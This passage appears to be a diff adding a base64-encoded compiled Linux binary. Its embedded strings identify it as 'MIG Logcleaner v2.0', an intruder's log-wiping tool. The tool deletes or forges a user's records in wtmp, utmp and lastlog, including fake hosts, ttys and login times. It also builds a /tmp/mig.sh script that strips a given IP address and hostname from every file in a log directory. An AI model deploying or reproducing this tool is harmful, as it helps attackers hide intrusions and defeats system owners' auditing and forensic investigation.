+qfT//4PEEOkN////kItFDItVECnCidA5hez8//8PhQQBAAD/BQDHBAiD7AhqEI2FuPr//1DoE/T/
+/4PEEIPsDI2F+Pz//4PACFDojvP//4PEBInAicBAUOhA8///g8QQicCj+MYECIPsCI2F+Pz//4PA
+CFD/NfjGBAjoLvT//4PEEIPsDI2F+Pz//4PATFDoSfP//4PEBInAicBAUOj78v//g8QQicCj8MYE
+CIPsCI2F+Pz//4PATFD/NfDGBAjo6fP//4PEEIPsBP+1TP7//2gnqwQIjYW4+v//UOis8///g8QQ
+g+wMjYW4+v//UOjq8v//g8QEicCJwEBQ6Jzy//+DxBCJwKP0xgQIg+wE/7VM/v//aCerBAj/NfTG
+BAjoafP//4PEEIN9DAAPhOj9//+D7ARogAEAAI2F+Pz//1D/tfD8///oAvL//4PEEOnG/f//ifaD
+7ARogAEAAI2F+Pz//1D/tfD8///o3vH//4PEEOmi/f//ifaD7Az/tfT8///o5vH//4PEEIPsDP+1
+8Pz//+jV8f//g8QQg30MAHU5g73s/P//AHQwg+wIaCypBAj/dQj/tez8////NfzGBAj/BfzGBAho
+QKsECP81VMgECOim8f//g8Qgx4Xs/P//AAAAAIPsCGoCaHCrBAjoSvL//4PEEInAiYX0/P//g730
+/P///3Uug30UAXUbg+wEaHCrBAhohaoECP81WMgECOhY8f//g8QQg+wMav/oO/L//412AIPsCGpC
+aH6rBAjo+fH//4PEEInAiYXw/P//g73w/P///3Ucg30UAXUWg+wIaKCrBAj/NVjIBAjoDPH//4PE
+EIPsBGoAagD/tfT8///oh/H//4PEEIPsBGoAagD/tfD8///ocvH//4PEEI12AIPsBGiAAQAAjYV4
+/v//UP+19Pz//+ji8f//g8QQicA9gAEAAHQG6REBAACQjYV4/v//g8Asg+wI/3UIUOh78P//g8QQ
+icCJwIXAD4XIAAAAjYXs/P///wCLhej8//87hXz+//8PhYIAAACNlcj8//+NhXj+//+DwAiD7AhS
+UOg58P//g8QQicCJwIXAdV6Nlcj7//+NhXj+//+DwEyD7AhSUOgV8P//g8QQicCJwIXAdTqDfQwA
+D4RE////g+wMaHCrBAj/dQj/NfzGBAj/BfzGBAho4KsECP81VMgECOj57///g8Qg6RX///+Qg30M
+AA+ECv///4PsBGiAAQAAjYV4/v//UP+18Pz//+ic7///g8QQ6ej+//+D7ARogAEAAI2FeP7//1D/
+tfD8///oeu///4PEEOnG/v//ifaD7Az/tfT8///ogu///4PEEIPsDP+18Pz//+hx7///g8QQg30M
+AHU5g73s/P//AHQwg+wIaHCrBAj/dQj/tez8////NfzGBAj/BfzGBAhoQKsECP81VMgECOhC7///
+g8Qgg+wIaHCrBAhoLKkECGhwqwQIaCypBAhoIKwECI2FyPr//1DoJ/D//4PEIIPsDI2FyPr//1Do
+Fe///4PEELgAAAAAycONdgBVieWB7FgBAACD7AhoJAEAAI2FuP7//1Doq+///4PEEIPsDP91COit
+7///g8QQicCJRfSDffQAD4T3AAAAg+wIagJoWKwECOhs7///g8QQicCJhbT+//+DvbT+//8AD4jQ
+AAAAg+wEagCLRfSLUAiJ0MHgAwHQweADAdDB4AJQ/7W0/v//6P7u//+DxBCDPQDHBAgBdUaDfRwA
+dECD7ARoAAEAAP91EI2FuP7//4PAJFDo4u7//4PEEIPsBGog/3UUjYW4/v//g8AEUOjI7v//g8QQ
+i0UYiYW4/v//g+wMaFisBAj/dQj/NfzGBAj/BfzGBAhogKwECP81VMgECOj17f//g8Qgg+wEaCQB
+AACNhbj+//9Q/7W0/v//6Kjt//+DxBCD7Az/tbT+///ot+3//4PEELgAAAAAycOQVYnlgexoBQAA
+x4XY/P//AAAAAMeF1Pz//wAAAACLRSCJhfD8///HhfT8//8AAAAAi0UkiYXo/P//x4Xs/P//AAAA
+AIPsCGogjYWo/P//UOg47v//g8QQg+wIaAABAACNhaj7//9Q6CHu//+DxBCD7AhoAAEAAI2FqPr/
+/1DoCu7//4PEEIN9EP8PhJIHAACD7AhqAmgsqQQI6N7t//+DxBCJwImF4Pz//4O94Pz///91LoN9
+KAF1G4PsBGgsqQQIaIWqBAj/NVjIBAjo7Oz//4PEEIPsDGr/6M/t//+NdgCD7AhqQmicqgQI6I3t
+//+DxBCJwImF3Pz//4O93Pz///91KYN9KAF1FoPsCGjAqgQI/zVYyAQI6KDs//+DxBCD7Axq/+iD
+7f//jXYAg+wEagBqAP+14Pz//+gO7f//g8QQg+wEagBqAP+13Pz//+j57P//g8QQifaD7ARogAEA
+AI2F+Pz//1D/teD8///oau3//4PEEInAPYABAAB0BukhAwAAkI2F+Pz//4PALIPsCP91CFDoA+z/
+/4PEEInAicCFwA+FiAIAAGaDvfj8//8ID4R6AgAAjYXY/P///wCLVQyLRRAp0EA5hdj8//8PhSEB
+AACNhdT8////AIPsCGgsqQQI/3UM/3UI/zX8xgQI/wX8xgQIaMCsBAj/NVTIBAjot+v//4PEIIuF
+/Pz//4mF5Pz//4PsCI2F+Pz//4PACFCNhaj8//9Q6L/s//+DxBCD7AiNhfj8//+DwExQjYWo+///
+UOij7P//g8QQi0UYgDgAdC+D7AhqII2F+Pz//4PALFDoJOz//4PEEIPsCP91GI2F+Pz//4PALFDo
+bOz//4PEEItFHIA4AHQyg+wIaAABAACNhfj8//+DwExQ6Orr//+DxBCD7Aj/dRyNhfj8//+DwExQ
+6DLs//+DxBCDfSAAdAyLhfD8//+JhUz+//+D7ARogAEAAI2F+Pz//1D/tdz8///oo+r//4PEEOln
+/v//jXYAi0UMi1UQKcKJ0DmF2Pz//w+FBAEAAP8FAMcECIPsCGoQjYWY+v//UOhr6///g8QQg+wM
+jYX4/P//g8AIUOjm6v//g8QEicCJwEBQ6Jjq//+DxBCJwKP4xgQIg+wIjYX4/P//g8AIUP81+MYE
+COiG6///g8QQg+wMjYX4/P//g8BMUOih6v//g8QEicCJwEBQ6FPq//+DxBCJwKPwxgQIg+wIjYX4
+/P//g8BMUP818MYECOhB6///g8QQg+wE/7VM/v//aCerBAiNhZj6//9Q6ATr//+DxBCD7AyNhZj6
+//9Q6ELq//+DxASJwInAQFDo9On//4PEEInAo/TGBAiD7AT/tUz+//9oJ6sECP819MYECOjB6v//
+g8QQg+wEaIABAACNhfj8//9Q/7Xc/P//6GTp//+DxBDpKP3//4O91Pz//wF1SI2VqPz//42F+Pz/
+/4PACIPsCFJQ6Erp//+DxBCJwInAhcB1JGaDvfj8//8IdRqNhdT8////CIN9JAB0DIuF6Pz//4mF
+TP7//4PsBGiAAQAAjYX4/P//UP+13Pz//+jx6P//g8QQ6bX8//+Qg+wM/7Xg/P//6Pro//+DxBCD
+7Az/tdz8///o6ej//4PEEMeF2Pz//wAAAADHhdT8//8AAAAAg+wIagJocKsECOiT6f//g8QQicCJ
+heD8//+DveD8////dSuDfSgBdRuD7ARocKsECGiFqgQI/zVYyAQI6KHo//+DxBCD7Axq/+iE6f//
+g+wIakJofqsECOhF6f//g8QQicCJhdz8//+Dvdz8////dRyDfSgBdRaD7AhooKsECP81WMgECOhY
+6P//g8QQg+wEagBqAP+14Pz//+jT6P//g8QQg+wEagBqAP+13Pz//+i+6P//g8QQjXYAg+wEaIAB
+AACNhXj+//9Q/7Xg/P//6C7p//+DxBCJwD2AAQAAdAbp+QEAAJCNhXj+//+DwCyD7Aj/dQhQ6Mfn
+//+DxBCJwInAhcAPhWQBAACNhdj8////AIuF5Pz//zuFfP7//w+FJgEAAI2VqPz//42FeP7//4PA
+CIPsCFJQ6IXn//+DxBCJwInAhcAPhf4AAACNlaj7//+NhXj+//+DwEyD7AhSUOhd5///g8QQicCJ
+wIXAD4XWAAAAjYXU/P///wCD7AxocKsECP91CP81/MYECP8F/MYECGgArQQI/zVUyAQI6D/n//+D
+xCCLRRiAOAB0L4PsCGogjYV4/v//g8AsUOjw5///g8QQg+wI/3UYjYV4/v//g8AsUOg46P//g8QQ
+i0UcgDgAdDKD7AhoAAEAAI2FeP7//4PATFDotuf//4PEEIPsCP91HI2FeP7//4PATFDo/uf//4PE
+EIN9IAB0CYuF8Pz//4lFzIPsBGiAAQAAjYV4/v//UP+13Pz//+hy5v//g8QQ6XL+//+J9oPsBGiA
+AQAAjYV4/v//UP+13Pz//+hO5v//g8QQ6U7+//+J9oO91Pz//wF1RY2VqPz//42FeP7//4PACIPs
+CFJQ6DLm//+DxBCJwInAhcB1IWaDvXj+//8IdReNhdT8////CIN9JAB0CYuF6Pz//4lFzIPsBGiA
+AQAAjYV4/v//UP+13Pz//+jc5f//g8QQ6dz9//+D7Az/teD8///o5uX//4PEEIPsDP+13Pz//+jV
+5f//g8QQx4XU/P//AAAAAIPsCGhwqwQIaCypBAhocKsECGgsqQQIaCCsBAiNhaj6//9Q6MDm//+D
+xCCD7AyNhaj6//9Q6K7l//+DxBC4AAAAAMnDVYnlgeyYBQAAx4Vs+///AAAAAMeFaPv//wAAAACD
+7AhoAAEAAI2FaPr//1DoM+b//4PEEGbHhfj8//8HAMeF/Pz//wAAAABmx4VE/v//AABmx4VG/v//
+AADHhUj+//8AAAAAi0UkiYVM/v//x4VQ/v//AAAAAIPsCP91GI2F+Pz//4PALFDoOeb//4PEEIPs
+CP91HI2F+Pz//4PACFDoIeb//4PEEIPsCP91II2F+Pz//4PATFDoCeb//4PEEGbHhXj7//8IAMeF
+fPv//wAAAABmx4XE/P//AABmx4XG/P//AADHhcj8//8AAAAAi0UoiYXM/P//x4XQ/P//AAAAAIPs
+CP91GI2FePv//4PALFDor+X//4PEEIPsCP91HI2FePv//4PACFDol+X//4PEEIPsCP91II2FePv/
+/4PATFDof+X//4PEEIPsCGoCaCypBAjo/eT//4PEEInAiYV0+///g710+////w+EZQIAAIPsCGpC
+aJyqBAjo1uT//4PEEInAiYVw+///g71w+////3Ucg30sAXUWg+wIaMCqBAj/NVjIBAjo6eP//4PE
+EJCQg+wEaIABAACNhXj+//9Q/7V0+///6Ork//+DxBCJwD2AAQAAdAbpJQEAAJCNhXj+//+DwCyD
+7Aj/dQhQ6IPj//+DxBCJwInAhcAPhdwAAABmg714/v//CA+EzgAAAI2FbPv///8Ai1UMi0UQKdBA
+OYVs+///D4WNAAAAg+wEaIABAACNhXj+//9Q/7Vw+///6B/j//+DxBCD7ARogAEAAI2F+Pz//1D/
+tXD7///oAuP//4PEEIPsBGiAAQAAjYV4+///UP+1cPv//+jl4v//g8QQg+wEaCypBAj/dQj/dQz/
+dRj/NfzGBAj/BfzGBAhoQK0ECP81VMgECOjl4v//g8Qg6fn+//+Qg+wEaIABAACNhXj+//9Q/7Vw
++///6JLi//+DxBDp1v7//4n2g+wEaIABAACNhXj+//9Q/7Vw+///6G7i//+DxBDpsv7//4n2i0UI
+gDgAdXWDvWj7//8AdWyD7ARogAEAAI2F+Pz//1D/tXD7///oOeL//4PEEIPsBGiAAQAAjYV4+///
+UP+1cPv//+gc4v//g8QQg+wMaCypBAj/dRj/NfzGBAj/BfzGBAhooK0ECP81VMgECOgi4v//g8Qg
+jYVo+////wCD7Az/tXT7///o+eH//4PEEIPsDP+1cPv//+jo4f//g8QQaCypBAhoLKkECGjgrQQI
+jYVo+v//UOjq4v//g8QQg+wMjYVo+v//UOjY4f//g8QQ6ySNdgCDfSwBdRuD7ARoLKkECGiFqgQI
+/zVYyAQI6KLh//+DxBDHhWz7//8AAAAAx4Vo+///AAAAALgAAAAAycNVieWB7PgDAACD7Aho5wMA
+AI2FCPz//1DoN+L//4PEEIPsDP91EP91DP91CGggrgQIjYUI/P//UOhX4v//g8Qgg+wMjYUI/P//
+UOhF4f//g8QQg+wMaNqwBAjoNeH//4PEEIPsDGjvsAQI6CXh//+DxBCD7Az/dQj/dRD/dQz/NfzG
+BAj/BfzGBAhoALEECOhw4f//g8Qgg+wMaO+wBAjoEOH//4PEEIPsDGg6sQQI6ADh//+DxBCD7Axo
+RrEECOjw4P//g8QQg+wMaFKxBAjo4OD//4PEELgAAAAAycOJ9lWJ5YPsCIPsDGiAqAQI6BHh//+D
+xBCD7AxowKgECOgB4f//g8QQg+wMaGCxBAjo8eD//4PEEIPsCP91CGigsQQI6N7g//+DxBCD7Axo
+7bEECOjO4P//g8QQg+wMaCCyBAjovuD//4PEEIPsDGiAsgQI6K7g//+DxBCD7AxowLIECOie4P//
+g8QQg+wMaCCzBAjojuD//4PEEIPsDGiAswQI6H7g//+DxBCD7AxowLMECOhu4P//g8QQg+wMaCC0
+BAjoXuD//4PEEIPsDGhgtAQI6E7g//+DxBCD7AxooLQECOg+4P//g8QQg+wMaOC0BAjoLuD//4PE
+EIPsDGhAtQQI6B7g//+DxBCD7AxogrUECOgO4P//g8QQg+wI/3UIaKC1BAjo+9///4PEEIPsCP91
+CGjgtQQI6Ojf//+DxBCD7Aj/dQhoALYECOjV3///g8QQg+wI/3UIaEC2BAjowt///4PEEIPsCP91
+CGiAtgQI6K/f//+DxBC4AAAAAMnDkJCQkJCQkJCQVYnlU4PsBKEIxwQIuwjHBAiD+P90Fo12AI28
+JwAAAACD6wT/0IsDg/j/dfRYW13DVYnlg+wIiexdw422AAAAAFWJ5VNS6AAAAABbgcMOHwAAjXYA
+6Ffg//+LXfzJwwAAAwAAAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvdmFyL2xvZy8AdTpu
+OkQ6YTpiOlU6VDpIOkk6TzpSQWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChtbMDsz
+Mm0qKioqKioqKioqKioqKioqKioqKioqKioqKioqKiobWzBtCgAAAAAAAAAAAAAAAAAAAAAAAAAA
+ABtbMDszMm0qIE1JRyBMb2djbGVhbmVyIHYyLjAgYnkgG1swOzMxbW5vMSAbWzA7MzJtKhtbMG0K
+AAAAAAAAAAAbWzA7MzJtKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqG1swbQoKAC92YXIv
+bG9nL3d0bXAAAAAAAAAARXJyb3Igb3BlbmluZyAlcyBmaWxlIHRvIGNvdW50IHJlY29yZHMKAAoA
+AAAAAAAAkIwECJyKBAicigQILIsECJyKBAicigQInIoECAiMBAgwjAQInIoECJyKBAicigQInIoE
+CJyKBAhYjAQInIoECJyKBAiAjAQInIoECOCLBAi4iwQInIoECJyKBAicigQInIoECJyKBAicigQI
+nIoECJyKBAicigQInIoECJyKBAhoiwQIkIsECJyKBAigjAQInIoECJyKBAicigQInIoECJyKBAic
+igQInIoECJyKBAicigQIDIsECJyKBAicigQInIoECJyKBAicigQInIoECOyKBAgAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAWzB4JWRdICVkIHVzZXJzICIlcyIgZGV0ZWN0ZWQgaW4gJXMKAEVy
+cm9yIG9wZW5pbmcgJXMgZmlsZQoAL3RtcC9XVE1QLlRNUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+RXJyb3Igb3BlbmluZyAvdG1wL1dUTVAuVE1QIGZpbGUKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAFsweCVkXSBSZW1vdmVkICIlcyIgZW50cnkgIyVkIGZyb20gJXMKACVsZAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAABbMHglZF0gUmVtb3ZlZCAlZCBlbnRyaWVzIG9mIHVzZXIgIiVzIiBmcm9t
+ICVzCgAvdmFyL3J1bi91dG1wAC90bXAvVVRNUC5UTVAAAAAAAAAAAAAAAAAAAAAAAAAAAABFcnJv
+ciBvcGVuaW5nIC90bXAvVVRNUC5UTVAgZmlsZQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAWzB4JWRdIFJlbW92ZWQgIiVzIiBjb3Jlc3BvbmRpbmcgZW50cnkgZnJvbSAlcwoAAAAAAAAA
+AAAAAAAAAAAAAG12IC90bXAvV1RNUC5UTVAgJXM7bXYgL3RtcC9VVE1QLlRNUCAlcztjaG1vZCA2
+NDQgJXMgJXMAL3Zhci9sb2cvbGFzdGxvZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsweCVkXSBD
+aGFuZ2luZyAiJXMiIGNvcmVzcG9uZGluZyBlbnRyeSBpbiAlcwoAAAAAAAAAAAAAAAAAAAAAAABb
+MHglZF0gUmVwbGFjZWQgIiVzIiBlbnRyeSAjJWQgZnJvbSAlcwoAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAWzB4JWRdIFJlcGxhY2VkICIlcyIgY29yZXNwb25kaW5nIGVudHJ5IGZyb20gJXMKAAAA
+AAAAAAAAAAAAAAAAAFsweCVkXSBBZGRlZCAgdXNlciAiJXMiIGJlZm9yZSAlZCBlbnRyeSBvZiB1
+c2VyICIlcyIgaW4gJXMgZmlsZQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsweCVk
+XSBBZGRlZCAgdXNlciAiJXMiIGVudHJ5IG9uIHRvcCBvZiAgJXMgZmlsZQoAAAAAAAAAAAAAAAAA
+AABtdiAvdG1wL1dUTVAuVE1QICVzO2NobW9kIDY0NCAlcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAZWNobyAiZmluZCAlcyAtdHlwZSBmfGdyZXAgLXYgd3RtcHxncmVwIC12IHV0bXB8
+Z3JlcCAtdiBsYXN0bG9nPi90bXAvZGlycy5JUCI+L3RtcC9taWcuc2g7ZWNobyAiaWYgWyAtcyAv
+dG1wL2RpcnMuSVAgXSI+Pi90bXAvbWlnLnNoO2VjaG8gdGhlbj4+L3RtcC9taWcuc2g7ZWNobyAi
+c2V0IFxgY2F0IC90bXAvZGlycy5JUFxgIj4+L3RtcC9taWcuc2g7ZWNobyAiZm9yIEYxIGluIFxg
+ZWNobyBcJEBcYCI+Pi90bXAvbWlnLnNoO2VjaG8gZG8+Pi90bXAvbWlnLnNoO2VjaG8gImNhdCBc
+IlwkRjFcInxncmVwIC12IFwiJXNcIj4vdG1wL0YxLnRtcDtjYXQgL3RtcC9GMS50bXA+XCJcJEYx
+XCIiPj4vdG1wL21pZy5zaDtlY2hvIGRvbmU+Pi90bXAvbWlnLnNoO2VjaG8gZmk+Pi90bXAvbWln
+LnNoO2VjaG8gImlmIFsgLXMgL3RtcC9kaXJzLklQIF0iPj4vdG1wL21pZy5zaDtlY2hvIHRoZW4+
+Pi90bXAvbWlnLnNoO2VjaG8gInNldCBcYGNhdCAvdG1wL2RpcnMuSVBcYCI+Pi90bXAvbWlnLnNo
+O2VjaG8gImZvciBGMiBpbiBcYGVjaG8gXCRAXGAiPj4vdG1wL21pZy5zaDtlY2hvIGRvPj4vdG1w
+L21pZy5zaDtlY2hvICJjYXQgXCJcJEYyXCJ8Z3JlcCAtdiBcIiVzXCI+L3RtcC9GMi50bXA7Y2F0
+IC90bXAvRjIudG1wPlwiXCRGMlwiIj4+L3RtcC9taWcuc2g7ZWNobyBkb25lPj4vdG1wL21pZy5z
+aDtlY2hvIGZpPj4vdG1wL21pZy5zaABjaG1vZCAreCAvdG1wL21pZy5zaAAvdG1wL21pZy5zaAAA
+AAAAAFsweCVkXSBSZW1vdmVkICIlcyIgYW5kICIlcyIgc3RyaW5ncyBvdXQgb2YgJXMgZGlyZWNv
+dHJ5CgAvdG1wL0YxLnRtcAAvdG1wL0YyLnRtcAAvdG1wL2RpcnMuSVAAABtbMDszMm0qKioqKioq
+KioqKioqKioqKioqKioqKioqKioqKiobWzBtCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c2FnZTog
+JXMgWy11XSBbLW5dIFstZF0gWy1hXSBbLWJdIFstUl0gWy1BXSBbLVVdIFstVF0gWy1IXSBbLUld
+IFstT10gWy1kXQoKACBbLXUgPHVzZXI+XQktIHVzZXJuYW1lCgAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAACBbLW4gPG4+XQktIHVzZXJuYW1lIHJlY29yZCBudW1iZXIsIDAgcmVtb3ZlcyBhbGwg
+cmVjb3JkcyAoZGVmYXVsdDogMSkKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbLWQgPGRpcj5d
+CS0gbG9nIGRpcmVjdG9yeSAoZGVmYXVsdDogL3Zhci9sb2cvKQoAAAAAAAAAAAAAAAAAAAAgWy1h
+IDxzdHJpbmcxPl0JLSBzdHJpbmcgdG8gcmVtb3ZlIG91dCBvZiBldmVyeSBmaWxlIGluIGEgbG9n
+IGRpciAoaXA/KQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgWy1iIDxzdHJpbmcyPl0JLSBzdHJp
+bmcgdG8gcmVtb3ZlIG91dCBvZiBldmVyeSBmaWxlIGluIGEgbG9nIGRpciAoaG9zdG5hbWU/KQoA
+AAAAAAAAAAAAAAAAAAAAAAAgWy1SXQkJLSByZXBsYWNlIGRldGFpbHMgb2Ygc3BlY2lmaWVkIHVz
+ZXIgZW50cnkKAAAAAAAAAAAAAAAAAAAAIFstQV0JCS0gYWRkIG5ldyBlbnRyeSBiZWZvcmUgc3Bl
+Y2lmaWVkIHVzZXIgZW50cnkgKGRlZmF1bHQ6IDFzdCBlbnRyeSBpbiBsaXN0KQoAAAAAAAAAAAAA
+AAAAAAAAIFstVSA8dXNlcj5dCS0gbmV3IHVzZXJuYW1lIHVzZWQgaW4gLVIgb2YgLUEKAAAAAAAA
+AAAAAAAAAAAAAAAAACBbLVQgPHR0eT5dCS0gbmV3IHR0eSB1c2VkIGluIC1BCgAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAgWy1IIDxob3N0Pl0JLSBuZXcgaG9zdG5hbWUgdXNlZCBpbiAt
+UiBvciAtQQoAAAAAAAAAAAAAAAAAAAAAAAAAIFstSSA8bj5dCS0gbmV3IGxvZyBpbiB0aW1lIHVz
+ZWQgaW4gLVIgb3IgLUEgKHVuaXQgdGltZSBmb3JtYXQpCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAIFstTyA8bj5dCS0gbmV3IGxvZyBvdXQgdGltZSB1c2VkIGluIC1SIG9yIC1BICh1
+bml0IHRpbWUgZm9ybWF0KQoAIFstZF0JCS0gZGVidWcgbW9kZQoKAAAAAAAAAAAAZWc6ICAgICVz
+IC11IGpvaG4gLW4gMiAtZCAvc2VjcmV0L2xvZ3MvIC1hIDEuMi4zLjQgLWIgbGVldC5vcmcKACAg
+ICAgICAlcyAtdSBqb2huIC1uIDYKAAAAAAAAAAAAICAgICAgICVzIC1kIC9zZWNyZXQvbG9ncy8g
+LWEgMS4yLjMuNAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAgICAlcyAtdSBqb2huIC1u
+IDIgLVIgLUggY2hpbmEuZ292CgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgICAgICAgJXMgLXUg
+am9obiAtbiA1IC1BIC1VIGphbmUgLVQgdHR5MSAtSCBhcmIuY29tIC1JIDEyMzQ1MzM0IC1PIDEy
+MzQ1Mzk3CgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTHBAgAAAAAAAAAAAAAAAAAAAAAAQAA
+AAAAAAAAAAAA/////wAAAAD/////AAAAAIzHBAgAAAAAAAAAAJKGBAiihgQIsoYECMKGBAjShgQI
+4oYECPKGBAgChwQIEocECCKHBAgyhwQIQocECFKHBAhihwQIcocECIKHBAiShwQIoocECLKHBAjC
+hwQI0ocECOKHBAjyhwQIAogECBKIBAgAAAAAAQAAABAAAAAMAAAAZIYECA0AAAAAqAQIBAAAACiB
+BAgFAAAA4IMECAYAAADwgQQICgAAABYBAAALAAAAEAAAABUAAAAAAAAAAwAAABjHBAgCAAAAyAAA
+ABQAAAARAAAAFwAAAJyFBAgRAAAAfIUECBIAAAAgAAAAEwAAAAgAAAD+//9vTIUECP///28BAAAA
+8P//bwyFBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
+AAAAAACiAIUZAAAIAAAAZAAAAESIBAgBAAAAZAAAAESIBAg6AAAAPAAAAAAAAABJAAAAgAAAAAAA
+AABzAAAAgAAAAAAAAACNAAAAgAAAAAAAAAC8AAAAgAAAAAAAAAD0AAAAgAAAAAAAAAAxAQAAgAAA
+AAAAAACCAQAAgAAAAAAAAADTAQAAgAAAAAAAAAD+AQAAgAAAAAAAAAAtAgAAgAAAAAAAAABXAgAA
+gAAAAAAAAACAAgAAgAAAAAAAAACaAgAAgAAAAAAAAAC1AgAAgAAAAAAAAADWAgAAgAAAAAAAAAAP
+AwAAgAAAAAAAAAAyAwAAgAAAAAAAAABXAwAAgAAAAAAAAACBAwAAgAAAAAAAAACqAwAAggAAAAAA
+AADEAwAAggAAAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAAALBAAAggAAAGNWAAAmBAAAggAA
+AO9bAQBOBAAAggAAAAAAAABkBAAAggAAAAAAAAB7BAAAggAAAAAAAAAAAAAAogAAAAAAAAAAAAAA
+ogAAAAAAAAAAAAAAogAAAAAAAACPBAAAggAAANgEAADIBAAAgADHAAAAAAAAAAAAogAAAAAAAADc
+BAAAgAAgAAAAAADzBAAAgAAhAAAAAAAKBQAAgAAiAAAAAAAfBQAAgAAjAAAAAAA1BQAAgAAlAAAA
+AABNBQAAgAAmAAAAAABjBQAAgAAxAAAAAAB6BQAAgAAyAAAAAACSBQAAgAAzAAAAAACpBQAAgAA0
+AAAAAADCBQAAgAA1AAAAAADaBQAAgAA2AAAAAADzBQAAgAA4AAAAAAALBgAAgAA5AAAAAAAkBgAA
+gAA7AAAAAABEBgAAgAA9AAAAAABaBgAAgAA+AAAAAABwBgAAgAA/AAAAAACGBgAAgABAAAAAAACc
+BgAAgABBAAAAAACzBgAAgABCAAAAAADLBgAAgABDAAAAAADhBgAAgABEAAAAAAD4BgAAgABFAAAA
+AAAOBwAAgABGAAAAAAAmBwAAgABHAAAAAAA9BwAAgABIAAAAAABWBwAAgABJAAAAAABrBwAAgABO
+AAAAAADRBwAAgABRAAAAAADpBwAAgABSAAAAAAAJCAAAgABTAAAAAAAgCAAAgABUAAAAAAA7CAAA
+gABVAAAAAABXCAAAgABWAAAAAABvCAAAgABYAAAAAACHCAAAgABbAAAAAAChCAAAgABeAAAAAAC5
+CAAAgABlAAAAAADPCAAAgABoAAAAAADpCAAAgABsAAAAAAADCQAAgABxAAAAAAAcCQAAgAByAAAA
+AAA3CQAAgAB1AAAAAABSCQAAgAB2AAAAAABvCQAAgAB5AAAAAACKCQAAgAB6AAAAAACnCQAAgAB9
+AAAAAAC/CQAAgACAAAAAAADYCQAAgACDAAAAAADzCQAAgACEAAAAAAAPCgAAgACHAAAAAAAoCgAA
+gACKAAAAAABCCgAAggAAAMuUAQB2CgAAggAAAEYQAACeCgAAgAAAAAAAAAAAAAAAogAAAAAAAADU
+CgAAgAAAAAAAAAAcCwAAgAAjAAAAAABYCwAAgAAAAAAAAABbDAAAgAA0AAAAAAB3DAAAgAA8AAAA
+AADEDAAAgABDAAAAAAD8DAAAgABGAAAAAAAYDQAAgABTAAAAAACrDQAAgABaAAAAAADpDQAAgABe
+AAAAAAAGDgAAgAAAAAAAAADbDgAAgABsAAAAAAD7DgAAgAB0AAAAAABPDwAAgAB5AAAAAABwDwAA
+gACBAAAAAAD4DwAAgACGAAAAAAA2EAAAgACMAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAACP
+BAAAggAAABEKAABOEAAAgAAfAQAAAABkEAAAgAA4AQAAAAAAAAAAogAAAAAAAAB5EAAAggAAAAAA
+AACMEAAAggAAAGIfAACPBAAAggAAAAAAAAAAAAAAogAAAAAAAACeEAAAggAAAAAAAAAAAAAAogAA
+AAAAAADLEAAAgABLAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAABOEQAAgAAeAAAAAACREQAA
+gAAjAAAAAADWEQAAggAAAAAAAADpEQAAggAAADXBAQBOBAAAwgAAAAAAAAB5EAAAwgAAAAAAAACM
+EAAAggAAAAAAAACPBAAAwgAAAAAAAACeEAAAwgAAAAAAAAAAAAAAogAAAAAAAACPBAAAwgAAAAAA
+AAD6EQAAgAAAAAAAAADZEgAAgAAAAAAAAAAQEwAAgABIAAAAAAA6EwAAgABLAAAAAABpEwAAgABM
+AAAAAACaEwAAgABVAAAAAADNEwAAgABaAAAAAAAIFAAAgABeAAAAAABBFAAAgABhAAAAAAB5FAAA
+gABiAAAAAACxFAAAgAAAAAAAAABeFQAAgAAAAAAAAAAHFwAAgAAAAAAAAAD9FwAAgAAAAAAAAAB0
+GAAAgACtAAAAAAAAAAAAogAAAAAAAAAAAAAAogAAAAAAAACYGAAAgAA1AAAAAAALGQAAgAA3AAAA
+AAAjGQAAgAA4AAAAAAA7GQAAgAA5AAAAAABVGQAAgAA6AAAAAAAAAAAAogAAAAAAAABvGQAAIAAZ
+AAAAAAAAAAAAZAAAAESIBAgAaW5pdC5jAC91c3Ivc3JjL2J1aWxkLzE1ODY1OC1pMzg2L0JVSUxE
+L2dsaWJjLTIuMi40L2NzdS8AZ2NjMl9jb21waWxlZC4AaW50OnQoMCwxKT1yKDAsMSk7LTIxNDc0
+ODM2NDg7MjE0NzQ4MzY0NzsAY2hhcjp0KDAsMik9cigwLDIpOzA7MTI3OwBsb25nIGludDp0KDAs
+Myk9cigwLDMpOy0yMTQ3NDgzNjQ4OzIxNDc0ODM2NDc7AHVuc2lnbmVkIGludDp0KDAsNCk9cigw
+LDQpOzAwMDAwMDAwMDAwMDA7MDAzNzc3Nzc3Nzc3NzsAbG9uZyB1bnNpZ25lZCBpbnQ6dCgwLDUp
+PXIoMCw1KTswMDAwMDAwMDAwMDAwOzAwMzc3Nzc3Nzc3Nzc7AGxvbmcgbG9uZyBpbnQ6dCgwLDYp
